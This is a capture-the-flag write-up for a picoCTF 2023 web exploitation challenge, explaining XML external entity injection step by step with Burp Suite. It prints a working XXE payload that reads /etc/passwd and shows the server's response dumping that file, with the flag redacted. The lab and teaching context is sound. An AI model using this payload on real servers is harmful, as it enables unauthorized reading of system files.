Level: Medium
Tags: picoCTF 2023, Web Exploitation, XXE
Author: GEOFFREY NJOGU
Description:
The web project was rushed and no security assessment was done.
Can you read the /etc/passwd file?
Hints:
1. XML external entity Injection
Challenge link: https://play.picoctf.org/practice/challenge/376
It's usually good practice to look through the source code of the web site but in this case we already know what we are looking for thanks to the hint. For more background on XXE see the references below.
Start Burp Suite and set 'Intercept' to off under the Proxy -> Intercept tab. Then configure your browser to use Burp as its proxy and go to the web site.
Clicking on any of the 'Details' buttons sends a POST request with the following payload:
<?xml version="1.0" encoding="UTF-8"?><data><ID>2</ID></data>
We will inject code into this payload to read the /etc/passwd file.
Under Proxy -> HTTP history tab right-click on any of the POST requests and 'Send to Repeater'. Then navigate to the Repeater tab.
In the XML payload, add <!DOCTYPE data [<!ENTITY pico SYSTEM '/etc/passwd'>]> between the first XML line and <data>. Then replace the number with &pico; and don't change anything else.
In total your XML payload should look like this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ENTITY pico SYSTEM '/etc/passwd'>]>
<data>
<ID>
&pico;
</ID>
</data>
The 'pico' name is arbitrary and can be called anything. In many code examples it is called 'data', but I chose 'pico' here.
Press the 'Send' button to send your request.
The response should look like this:
HTTP/1.1 200 OK
Server: Werkzeug/2.2.3 Python/3.8.10
Date: Fri, 28 Jul 2023 11:58:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1023
Connection: close
Invalid ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flask:x:999:999::/app:/bin/sh
picoctf:x:1001:picoCTF{<REDACTED>}
The flag is included in the last line of the /etc/passwd file output.